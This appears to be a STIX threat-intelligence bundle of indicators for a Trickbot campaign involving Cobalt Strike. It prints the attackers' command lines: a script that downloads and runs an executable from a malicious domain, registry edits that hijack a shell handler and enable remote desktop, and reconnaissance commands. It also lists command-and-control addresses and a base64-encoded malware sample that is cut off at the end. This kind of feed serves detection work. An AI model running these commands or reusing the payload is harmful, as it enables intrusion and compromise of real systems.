{
"type" : "bundle" ,
"id" : "bundle--5e6793ed-2868-4474-a485-42210a0a020f" ,
"objects" : [
{
"type" : "identity" ,
"spec_version" : "2.1" ,
"id" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2021-05-24T10:05:31.000Z" ,
"modified" : "2021-05-24T10:05:31.000Z" ,
"name" : "laskowski-tech.com" ,
"identity_class" : "organization"
} ,
{
"type" : "report" ,
"spec_version" : "2.1" ,
"id" : "report--5e6793ed-2868-4474-a485-42210a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2021-05-24T10:05:31.000Z" ,
"modified" : "2021-05-24T10:05:31.000Z" ,
"name" : "Trickbot Gtag QW1" ,
"published" : "2020-07-03T03:59:04Z" ,
"object_refs" : [
"x-misp-attribute--5e67962c-66ec-41ba-8e88-41160a0a020f" ,
"x-misp-attribute--5e67962c-5304-4794-a7f1-40e60a0a020f" ,
"x-misp-attribute--5e67962c-0d04-4a3b-b127-4f900a0a020f" ,
"x-misp-attribute--5e67962c-0890-41b4-8ad5-44c40a0a020f" ,
"x-misp-attribute--5e67962c-11bc-4765-8d63-426c0a0a020f" ,
"x-misp-attribute--5e67962d-056c-4010-89f9-44730a0a020f" ,
"x-misp-attribute--5e67962d-6efc-4391-a42e-43560a0a020f" ,
"x-misp-attribute--5e67962d-b170-4f39-b589-404f0a0a020f" ,
"x-misp-attribute--5e67962d-4778-40ea-bbb0-4d550a0a020f" ,
"x-misp-attribute--5e67962d-8e84-4b7c-82a2-48340a0a020f" ,
"x-misp-attribute--5e67962d-1a8c-4983-9d89-40c30a0a020f" ,
"x-misp-attribute--5e67962d-1a00-4fe1-b68c-4d190a0a020f" ,
"x-misp-attribute--5e67962d-d638-4805-b97a-46810a0a020f" ,
"x-misp-attribute--5e67962d-50d0-4ff7-8730-45a10a0a020f" ,
"x-misp-attribute--5e67962d-be20-40c3-a0fc-4c250a0a020f" ,
"x-misp-attribute--5e67962d-9430-4d3c-9e36-4f300a0a020f" ,
"x-misp-attribute--5e67962d-5e14-472f-a5ae-4c580a0a020f" ,
"x-misp-attribute--5e67962d-e270-4656-ad55-4dc10a0a020f" ,
"indicator--5e679919-46a8-43dd-b8a5-4ec174656a8a" ,
"indicator--5e679919-10c8-46d0-b1bb-4d4d74656a8a" ,
"indicator--5e6799c2-a134-491d-9d9e-4d4b0a0a020f" ,
"indicator--5e679a4c-e90c-4176-ac29-44f30a0a020f" ,
"indicator--5e679e17-e970-4164-bfb5-48b00a0a020f" ,
"indicator--5e679e17-4efc-46ea-9030-4d270a0a020f" ,
"indicator--5e67a5f9-ec68-41ea-adeb-40950a0a020f" ,
"observed-data--5e70b052-319c-47bf-a3a8-461c0a0a020f" ,
"url--5e70b052-319c-47bf-a3a8-461c0a0a020f" ,
"indicator--5e67a350-52bc-4280-95d9-4c180a0a020f" ,
"indicator--5e67a35f-bc6c-4a73-901f-4d400a0a020f" ,
"indicator--5e67a3aa-e8c0-4340-8080-475b0a0a020f"
] ,
"labels" : [
"Threat-Report" ,
"misp:tool=\"MISP-STIX-Converter\"" ,
" Cobalt Strike Beacon" ,
"trickbot" ,
"Cobalt Strike" ,
"misp-galaxy:malpedia=\"TrickBot\""
] ,
"object_marking_refs" : [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962c-66ec-41ba-8e88-41160a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:16.000Z" ,
"modified" : "2020-03-10T13:29:16.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "%WINDIR%\\system32\\cmd.exe /c C:\\DiskDrive\\1\\Volume\\errorfix.bat"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962c-5304-4794-a7f1-40e60a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:16.000Z" ,
"modified" : "2020-03-10T13:29:16.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "cscript //nologo C:\\DiskDrive\\1\\Volume\\BackFiles\\pinumber[.]vbs hxxp://customscripts.us/QW1.exe C:\\DiskDrive\\1\\Volume\\BackFiles\\Jofert.exe"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962c-0d04-4a3b-b127-4f900a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:16.000Z" ,
"modified" : "2020-03-10T13:29:16.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "powershell -C Sleep -s 4;Saps 'C:\\DiskDrive\\1\\Volume\\BackFiles\\Jofert.exe'"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962c-0890-41b4-8ad5-44c40a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:16.000Z" ,
"modified" : "2020-03-10T13:29:16.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "%WINDIR%\\system32\\cmd[.]exe /C reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /v \"DelegateExecute\" /t REG_SZ /d \"\" /f"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962c-11bc-4765-8d63-426c0a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:16.000Z" ,
"modified" : "2020-03-10T13:29:16.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "%WINDIR%\\system32\\cmd.exe /C reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /t REG_SZ /d \"%WINDIR%\\system32\\cmd.exe /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe\" /f"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-056c-4010-89f9-44730a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /t REG_SZ /d \"%WINDIR%\\system32\\cmd.exe /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe\" /f"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-6efc-4391-a42e-43560a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /v \"DelegateExecute\" /t REG_SZ /d \"\" /f"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-b170-4f39-b589-404f0a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "\"%WINDIR%\\system32\\cmd[.]exe\" /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-4778-40ea-bbb0-4d550a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "cmd.exe \t/c net config workstation"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-8e84-4b7c-82a2-48340a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "cmd.exe /c ipconfig /all"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-1a8c-4983-9d89-40c30a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "cmd.exe \t/c net view /all"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-1a00-4fe1-b68c-4d190a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "cmd.exe \t/c net view /all /domain"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-d638-4805-b97a-46810a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "cmd.exe /c nltest /domain_trusts /all_trusts"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-50d0-4ff7-8730-45a10a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "\"%WINDIR%\\system32\\reg.exe\" add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-be20-40c3-a0fc-4c250a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "%WINDIR%\\system32\\cmd[.]exe /C reg add \"\\\\usha-bdc\\HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-9430-4d3c-9e36-4f300a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "reg add \"\\\\usha-bdc\\HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-5e14-472f-a5ae-4c580a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "%WINDIR%\\system32\\cmd.exe /C WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-e270-4656-ad55-4dc10a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e679919-46a8-43dd-b8a5-4ec174656a8a" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:04:10.000Z" ,
"modified" : "2020-03-10T14:04:10.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '95.179.210.8']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-10T14:04:10Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Cobalt Strike"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e679919-10c8-46d0-b1bb-4d4d74656a8a" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:04:25.000Z" ,
"modified" : "2020-03-10T14:04:25.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '50.87.170.67']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-10T14:04:25Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"trickbot"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e6799c2-a134-491d-9d9e-4d4b0a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:04:10.000Z" ,
"modified" : "2020-03-10T14:04:10.000Z" ,
"pattern" : "[url:value = 'https://serviceuphelper.com:80/avxbDFb']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-09T00:00:00Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\"" ,
"Cobalt Strike"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e679a4c-e90c-4176-ac29-44f30a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:03:53.000Z" ,
"modified" : "2020-03-10T14:03:53.000Z" ,
"pattern" : "[url:value = 'http://customscripts.us/QW1.exe']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-09T00:00:00Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\"" ,
"trickbot"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e679e17-e970-4164-bfb5-48b00a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:03:53.000Z" ,
"modified" : "2020-03-10T14:03:53.000Z" ,
"pattern" : "[domain-name:value = 'customscripts.us']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-09T00:00:00Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"domain\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"trickbot"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e679e17-4efc-46ea-9030-4d270a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:04:09.000Z" ,
"modified" : "2020-03-10T14:04:09.000Z" ,
"pattern" : "[domain-name:value = 'serviceuphelper.com']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-09T00:00:00Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"domain\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Cobalt Strike"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e67a5f9-ec68-41ea-adeb-40950a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:37:02.000Z" ,
"modified" : "2020-03-10T14:37:02.000Z" ,
"pattern" : "[url:value = 'http://64.44.133.131/images/cursor.png']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-09T00:00:00Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\"" ,
"trickbot"
]
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--5e70b052-319c-47bf-a3a8-461c0a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-17T11:11:14.000Z" ,
"modified" : "2020-03-17T11:11:14.000Z" ,
"first_observed" : "2020-03-17T11:11:14Z" ,
"last_observed" : "2020-03-17T11:11:14Z" ,
"number_observed" : 1 ,
"object_refs" : [
"url--5e70b052-319c-47bf-a3a8-461c0a0a020f"
] ,
"labels" : [
"misp:type=\"link\"" ,
"misp:category=\"External analysis\""
]
} ,
{
"type" : "url" ,
"spec_version" : "2.1" ,
"id" : "url--5e70b052-319c-47bf-a3a8-461c0a0a020f" ,
"value" : "https://laskowski-tech.com/2020/03/16/breakout-time-trickbot-edition/"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e67a350-52bc-4280-95d9-4c180a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:25:20.000Z" ,
"modified" : "2020-03-10T14:25:20.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' b 17e4833 c 580 b b d 343 a 1834 b e 0e2 a 65 f ' A N D f i l e : h a s h e s . S H A 1 = ' 7 a d 2 d 4 c 4 f e 0 e f d 0 21992391 f c d b 7e630 a 19 f 23 f 6 ' A N D f i l e : h a s h e s . S H A 256 = ' 5770 d 351522695562143 f b f 5 d 6381 c b 7 c 13151e3 d 3e1 c d c 923759 b c 60e025 b b e ' A N D f i l e : n a m e = ' J o f e r t . e x e ' A N D f i l e : s i z e = ' 385024 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A C p z a l B + O p F m U G 0 E A A D g B Q A g A B w A Y j E 3 Z T Q 4 M z N j N T g w Y m J k M z Q z Y T E 4 M z R i Z T B l M m E 2 N W Z V V A k A A 1 C j Z 15 Q o 2 d e d X g L A A E E I Q A A A A Q h A A A A f 0 u n s X A 7 k J U p U 0 U G R J Z v R p G W Z 1 o x W b 67 T M k x K R 3 p b j 37 W b w 64 I P P e 5 E v j O 0 q 8 j O P N Q e L 5 x 3 Z S a E f A P h 0 u y 8 Y m N b u R P X k Y M m 2 l B H z l f 94 C G J i f m I 0 y 0 p 9 D w 89 r I 8 a v Q D / O u 0 T g n s X 7 y h p a n 245 k G 7 u M B + N + W e u L q 53 C X K N m F L f H k V 1 Y O / A u f R S t O j P F Q v A J N G e b 4 O s F Z s M F A u u s N P j f b j u G l 13 a w r b 1 m i G T / 0 5 C S F D F u X m P D P t m W F X V A s 5 K E k B B j 1 G P u j A 5 k a M / c h m O G Z b b f i O r h Y B + t s f r e U G D B Q 0 Z n K c 5 a n 8 i V W A i F / e 7 u N s 54 e z L E B 8 h m L c C z J j s e 3 K F e F e r S R p q d L Q 6 w P U f + J 8 C H 3 B 7 b h R 5 D R K 8 D s X E j e u X b B L V r E L i w B O H k 3 U T I f t j M h P l 7 C x q W i I 1 n S z 13 n M e 2 h q C 2 m t J L r w n 7 K y f C U z M h 2 Z l j + U e 9 v Q 9 t Z s c 4 b + v f a 3 t g i S y l m n H K J J E Y o a V 5 H z m w 2 D C d z Y 0 I 3 M t Q A g / Y O W N e T n k H P 371 h I 0 K n 8 f C H D 3 i r D H p 6 O O n i t / Q U C H 6 u O q x C v R i u a b Z r v 1 a 0 / f L 7 x X W P L d i 4 N o u J X / d N E d 4 i A j S H v N X W 7 t 9 i 5 Z G f m a X h u t O 0 N + q M T P N + K A 6 B E U g 5 v 6 / h 6 I Q 1 B l m W O 6 X 5 d 0 S K 
b x I A 7 U X B Y i c g x q + U f j S 56 h w 1 w I y g L S V //yg7edsW0MJq43vHsgfbcsoPfKdXwUuZqaijk7yb6wn9rFtDik4laF2Rsv/5kguwH4D4RDf67m1ZVE4b1MbxCyJZmRoU2wg51RQT89Vzvn+vt0hmkuNfIPs4nKhY0KGTkiTwmjVxR0EsNQJ+ZutUM2m1TE5UGLCQ5lM0+NKWj6r3AI8q9fyJ6JMZRfKoiX+JCdgl/8+6wBCBtJRFWosDrwQ5tUQXobId0C+BYsXJnXPAIj1BjinEkFTqCvemqJsv/SGCDR8ji/bbzWbIEpCsFLVf4qT3TeVIt6sQXh+ZojKkHwxCCmsBtkUjOcsggN7G6YGqhnaIjll+Y1Xj4IKbHwP8L8yXPDvwsn/Ka5aakry7z7Fj1wxrEmlpS9hjeprxi40PZt5TT6v9Sne4HmMjLayHNJd5hdd33XSp+W1iI3R9XQAwQsqEXQ4b0tIbuLnDqe68W1G1ThfhOZbIaeHxLg02v5pkPxQGSGGLo4fJ43DTuHmg4BnL652SZX2cO7XzdWiYFQFMPulNTN3i+K30Y6LEIzR1hI9MEgMafu4DXKnD1SRW/Caht0nzb4DtLzfIwzt+K/4cXmathJwe00x8tOAKhUK2DLJFmZ3OtYC1+y4mTL+wTKF0bo7p77Q78faf805PKqFUgu29pTskpOdJ6FB6AvO/7AhXtH9Nr6gQYmfCuoepFPAD+oJ8YI+m1q5YMhe33qJrYYgQTiS9Fk2Jhwn+9K/bAeUEvi37WZjtyNzPlgv2ljQyVF88gP+h7MWLxmTbo5YQT871XwL2EqV+WLxyNVy19HqW4BtmJHYtHu8+QAf/a/R7sm8bGsubCAXqXYpHXnuvPWM27k9hiy9A5QamvkHUTmLYj+C1FPxn6bi0oBpbRCgEMuIrOVpRr9MeB1nsdBfSpal1laKyzZRLZg59eEIrTxoOfyFfnS+sZt93qPO/b08QB3yODCjlMRKiFC6jRTMlK09UDM54QdIqEiaNBVI8wL4D5v/KTRDSdUc5DpXKB175rc6Vnzll+NC+vJSRWjYRLfUTgNBlEgXjs+MZB1Ou3B9g9j/NsV9AdbjofaSARAic+28dNZpnpYcSd3ds3yJj6SjYnzx68L5vDtBLSKzSac0/DBNdHy4NLGdVmjjXrQwbx/RtPQt5JDYXnXVFXsBikhFfwO5QYQgMcgVVDL0YfmuUWeSmFCfRtjV29iu/dn3Uw1lYbDJANP0UTLbaRWtEzwguBPkotAeJawsGjkGHd2lHV5lOIojqxYLhcDAn8kdwvqg9/wkFUvKwr2PLyjcevqQgLahKTXwf5JM7EYgCZy3KEJbHwqeTUvntv22aEoX0hyo5l4e+iOolR7kEU/c4gFe3X7xBgnpDNo0n7PNf4FPwSRFEypJ+L9rtGIW3n19A6JAgLSgofX2OgcXElEypCNQc3HASh7yft/ObV37ggRKp7kbjWRv9eVfBZ153a8QqSB942qV/eO0ozWmI1uaxszO3oRIX+jbtf2JbCoXDwctzI45+8k/SVBBhmQqDSsSWmvk+akEk4Tpkij89GNHbKNlE4BaZbSa7KMWKzJpqu615N4HlhBHbF97kpE0CrhjRdy4iBL1YenCBU4F9DzQ4gmiKYPQbKVm3pwucRYqIypfgM3kSx6mb6QV+BgBfTSZm8Z1TFQ5df/DYUOP9w6DrmzjgYlt3y2DMg4cC8KFjbwlQ8CDcpArC0DmOg6pBuoRflE6sHFg9/XswajyjP1FoLpcVi1t6V/GYix5hqvqNnjDAc3N5V825ola8Nz2O2rfh3QbuJJyyjRI1jx8S4NgbbSffNmChVzLWlOU/oPZpH20t+gHYRl2BNEk7SkGzCVGrnz+4tUwa6e/s1VKZlrsctoZDQcLw7AsoaC03ianiEvCh8pcEEGH08J3F1RK2OYQ36F7jNF2F3vAn6nqvwzwU4MFnavS7tm
